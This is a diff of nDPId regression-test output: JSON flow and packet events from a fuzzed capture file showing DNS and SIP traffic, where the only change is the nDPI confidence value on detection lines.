00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":2,"flow_last_seen":1120470815395,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470815395,"pkt":"ADBUADRWAODtAW69CABFAABIa6sAAIARS6bAqAECwKgBAQrwADUASDG\/+BUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":528,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470814334,"flow_last_seen":1120470815395,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470815395,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":528,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470814334,"flow_last_seen":1120470815395,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470815395,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":3,"flow_last_seen":1120470817390,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470817390,"pkt":"ADBUADRWAODtAW69CABFAABIa6wAAIARS6XAqAECwKgBAQrwADUANDG\/+BUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":530,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470819393,"flow_last_seen":1120470819393,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1120470819393,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":21,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":1120470819393,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":17,"thread_ts_msec":1120470819393,"pkt":"ADBUADRWAODtAW69CABFAAAlcwAAAIARS6TAqAECwKgBAQrwABUANDG\/+BUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3libXJjaXR5AmRrAAAhAAE="} @@ -1028,113 +1028,113 @@ 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":531,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":9587,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470819393,"pkt":"ADBUADRWAODtAW69JXMAAABIa64AAIARS6PAqAECwKgBAQrwADUANDG\/+BUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":535,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831400,"flow_last_seen":1120470831400,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470831400,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2801,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":1,"flow_last_seen":1120470831400,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470831400,"pkt":"ADBUADRWAODtAW69CABFAABEa7IAAIARS6PAqAECwKgBAQrxADUAMKq2ehcAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAQAwAAQ=="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831400,"flow_last_seen":1120470831400,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470831400,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2801,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":16396,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831400,"flow_last_seen":1120470831400,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470831400,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2801,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":16396,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":2,"flow_last_seen":1120470831402,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470831402,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CvEAR40yeheAAAABAAEAAAAAATEBMCVzADEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00886{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":536,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470831400,"flow_last_seen":1120470831402,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470831402,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2801,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":16396,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00886{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":536,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470831400,"flow_last_seen":1120470831402,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470831402,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2801,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":16396,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":537,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831403,"flow_last_seen":1120470831403,"flow_idle_time":620000,"flow_min_l4_payload_len":474,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":474,"flow_avg_l4_payload_len":474,"midstream":0,"thread_ts_msec":1120470831403,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","l4_proto":0,"flow_datalink":1,"flow_max_packets":3} 01075{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":1,"flow_last_seen":1120470831403,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":508,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":508,"pkt_l4_len":474,"thread_ts_msec":1120470831403,"pkt":"ADBUADRWAODtAW69CABFAAHua7MAJXMAFYzAqAEC1PIhIxPEE8QB2oO4UkVHSVNURVIgc2lwOnNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjticmFuY2g9ejloRzRiS25wMjY5MzY5tDUtNDc5ZTgzZjExOTIuMTY4LjEuMjtycG9ydA0KRnJvbTogPHNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9MTliMDYxNA0KVG86IDxzaXA6MzUxMDQ3MjNAc2lwLmN5YmVyY2l0eS5kaz4NCkNhbGwtSUQ6IDI5ODU4MTQ3LTQ2NWIwNzUyQDI5ODU4MDUxLTQ2NWIwN2IyDQpDb250YWN0OiBwZWwgPHNpcDozNTEwNDcyM0AxOTIuMTY4LjEuMjo1MDYwO2xpbmU9N2QzNjU1OGYzMTM2NzA1MT47ZXhwaXJlcz0xMjAwO3E9MC41MDANCkV4cGlyZXM6IDEyMDANCkNTZXE6IDMgUkVHSVNURVINCkNvbnRlbnQtTGVuZ3RoOiAwDQpNYXgtRm9yd2FyZHM6IDcwDQpVc2VyLUFnZW50OiBOZXJvIFNJUFBTIElQIFBob25lIFZlcnNpb2wgMi4wLjUxLjE2DQoNCg=="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":538,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831516,"flow_last_seen":1120470831516,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470831516,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2568,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1120470831516,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470831516,"pkt":"ADBUADRWAODsAW69CABFAABIa7QAAIARS53AqAECwKgBAQoIADUANBq8DxcBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":538,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831516,"flow_last_seen":1120470831516,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470831516,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2568,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":538,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831516,"flow_last_seen":1120470831516,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470831516,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2568,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":540,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470832512,"flow_last_seen":1120470832512,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470832512,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2802,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":1120470832512,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470832512,"pkt":"ADBUADRWAODtAW69CABFAABIa7UAAIARS5zAqAECwKgBAQryADUANBq8DxcBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":540,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470832512,"flow_last_seen":1120470832512,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470832512,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2802,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":540,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470832512,"flow_last_seen":1120470832512,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470832512,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2802,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":541,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470834515,"flow_last_seen":1120470834515,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470834515,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":18162,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":1120470834515,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470834515,"pkt":"ADBUADRWAODtAW69CABFAABIa7YAAIARS5vAqAECwKgBAUbyADUANBq8DxcBAAABRwAAAAAABF9zaXAEX3VkcANzaXAJY3loZXJjaXR5AmRrAAAhAAE="} -00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":541,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470834515,"flow_last_seen":1120470834515,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470834515,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":18162,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyhercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":541,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470834515,"flow_last_seen":1120470834515,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470834515,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":18162,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyhercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":544,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":2,"flow_last_seen":1120470836517,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470836517,"pkt":"ADBUADRWAODtAW69CABFAABIa7cAAIARS5rAqAECwKgBAQryADUANBq8DxcBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":3,"flow_last_seen":1120470840523,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470840523,"pkt":"ADBUADRWAODtAW69CABFAABIa7gAAIARS5nAqAECwKgBAQryADUANBq8DxcBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":546,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470848525,"flow_last_seen":1120470848525,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470848525,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2803,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1120470848525,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470848525,"pkt":"ADBUADRWAODtAW5iCABFAABEa7kAAIARS5zAqAECwKgBAQrzADUAMMmyWxkAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470848525,"flow_last_seen":1120470848525,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470848525,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2803,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470848525,"flow_last_seen":1120470848525,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470848525,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2803,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":2,"flow_last_seen":1120470848527,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470848527,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CvMAR6wuWxmAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAMMAAcAMAAyeAQAAJxAACwlsb2NhbGhvc3QA"} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":547,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470848525,"flow_last_seen":1120470848527,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470848527,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2803,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":547,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470848525,"flow_last_seen":1120470848527,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470848527,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2803,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":549,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470848643,"flow_last_seen":1120470848643,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470848643,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 